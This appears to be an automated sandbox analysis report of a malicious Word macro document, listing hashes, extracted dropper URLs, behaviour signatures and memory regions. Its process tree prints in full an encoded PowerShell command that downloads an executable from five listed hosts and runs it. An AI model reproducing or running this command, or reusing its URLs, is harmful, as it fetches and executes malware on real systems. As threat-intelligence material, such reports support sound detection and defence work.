Analysis

  • max time kernel
    118s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    25-06-2024 19:43

General

  • Target

    0f4b4224e8cf4f1d17e9ddbbc1d2754f_JaffaCakes118.doc

  • Size

    249KB

  • MD5

    0f4b4224e8cf4f1d17e9ddbbc1d2754f

  • SHA1

    8af07c2af3c4777dd4778ef05caa97c2c063f158

  • SHA256

    1a931c6fb2d0fc289a63c049465e1d54be273981aa9571f995aa87fdd13b0b4f

  • SHA512

    94633ab394e3482b1f88adb6ac1e81699526e6d5ed168aa3bce70e3511dfaf597524c241a47c89fadd817a2138f6d4ebeac9f6acc75cbcfb30a9259cd57cf44c

  • SSDEEP

    6144:P77HUUUUUUUUUUUUUUUUUUUT52V6BWLshhh+afk0SIhIvg+ZGPr:P77HUUUUUUUUUUUUUUUUUUUTChLsh7+0

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://decospirit.com/D5ubP/

exe.dropper

http://databacknow.com/logos/xsDJR/

exe.dropper

http://thienuy.com/wp-snapshots/0kmQW/

exe.dropper

http://deparcel.com/catalog/Mg/

exe.dropper

http://deselbybowen.com/LAO3/

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0f4b4224e8cf4f1d17e9ddbbc1d2754f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2948
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1188
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -enc JABuAEQAQgA0AEQAQQB3AFoAPQAoACcAdwBBAEEANABEACcAKwAnAEIAQgBVACcAKQA7ACQAYwBaAEEAUQBBAGsAQgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAEEAQQBDADEAVQA9ACgAJwBoAHQAdABwADoALwAvACcAKwAnAGQAZQBjAG8AcwAnACsAJwBwAGkAcgAnACsAJwBpAHQALgBjAG8AbQAvACcAKwAnAEQAJwArACcANQB1ACcAKwAnAGIAUAAvAEAAJwArACcAaAB0ACcAKwAnAHQAcAA6AC8ALwBkAGEAdABhAGIAYQBjACcAKwAnAGsAbgBvAHcALgBjAG8AJwArACcAbQAvAGwAbwBnAG8AcwAvAHgAcwAnACsAJwBEAEoAUgAnACsAJwAvAEAAaAB0AHQAcAAnACsAJwA6AC8ALwB0AGgAaQBlACcAKwAnAG4AdQB5AC4AJwArACcAYwBvAG0ALwB3ACcAKwAnAHAALQBzACcAKwAnAG4AYQBwAHMAaABvAHQAcwAvACcAKwAnADAAJwArACcAawBtAFEAVwAvAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AC8ALwBkAGUAcABhACcAKwAnAHIAYwBlAGwALgBjACcAKwAnAG8AJwArACcAbQAvAGMAYQB0ACcAKwAnAGEAbABvACcAKwAnAGcALwBNAGcALwAnACsAJwBAAGgAJwArACcAdAB0AHAAOgAnACsAJwAvAC8AJwArACcAZABlACcAKwAnAHMAZQBsAGIAJwArACcAeQBiAG8AdwBlAG4ALgBjAG8AbQAvACcAKwAnAEwAQQBPACcAKwAnADMAJwArACcALwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJAB6AFUARAB3AEEAeABDAD0AKAAnAEgARABYAEcAWAAnACsAJwBBAFUAJwApADsAJABtAEEAQgBEAFUAWgAgAD0AIAAoACcAMQAxACcAKwAnADMAJwApADsAJABaAEMAQQBBAEEAQQA9ACgAJwBIAGMAYwBBAGMAQgAnACsAJwBBACcAKQA7ACQAWgBVAEEAWAB3AEEAQQBCAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABtAEEAQgBEAFUAWgArACgAJwAuAGUAJwArACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFoAUQBVAEEAQQBBACAAaQBuACAAJABtAEEAQQBDADEAVQApAHsAdAByAHkAewAkAGMAWgBBAFEAQQBrAEIALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAWgBRAFUAQQBBAEEALAAgACQAWgBVAEEAWAB3AEEAQQBCACkAOwAkAE8ARABjAEQAWAB3AD0AKAAnAHMAQQBEACcAKwAnAF8AJwArACcAQQBBACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAFoAVQBBAFgAdwBBAEEAQgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAFoAVQBBAFgAdwBBAEEAQgA7ACQAaQBfAFEAQQBvAEEAMQBBAD0AKAAnAEIARABEAEQAQQBRAF8AJwArACcARAAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAdQBHADEAQQA0AFUAXwBBAD0AKAAnAGwAQQBBACcAKwAnAGsAQQBEACcAKQA7AA==
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:264

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      f31cd3bebc8c8c5b22e989da810bdf62

      SHA1

      d97b94365f6ca4f9d598fd2d10a9379924fb94e1

      SHA256

      9b918f125912e178f6312f61e26064a72108e8bb585d160a33dc9f97460df20d

      SHA512

      08b889c1e34916833203203d998f9dff2ed28533751f34d7c21381b8e61ff33eacd57be982da7e6eafd0f77edbfd279b56501e03b9a2a4575af9e2a9e4245dcf

    • memory/264-71-0x000000001B370000-0x000000001B652000-memory.dmp

      Filesize

      2.9MB

    • memory/264-72-0x0000000001F40000-0x0000000001F48000-memory.dmp

      Filesize

      32KB

    • memory/2948-16-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-65-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-62-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-7-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-64-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-63-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-61-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-50-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-36-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-29-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-21-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-20-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-19-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-18-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-17-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-0-0x000000002F9D1000-0x000000002F9D2000-memory.dmp

      Filesize

      4KB

    • memory/2948-22-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-15-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-8-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-2-0x0000000070B0D000-0x0000000070B18000-memory.dmp

      Filesize

      44KB

    • memory/2948-14-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-13-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-12-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-11-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-60-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-57-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-55-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-43-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-6-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-10-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-9-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-78-0x0000000070B0D000-0x0000000070B18000-memory.dmp

      Filesize

      44KB

    • memory/2948-79-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2948-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2948-97-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2948-98-0x0000000070B0D000-0x0000000070B18000-memory.dmp

      Filesize

      44KB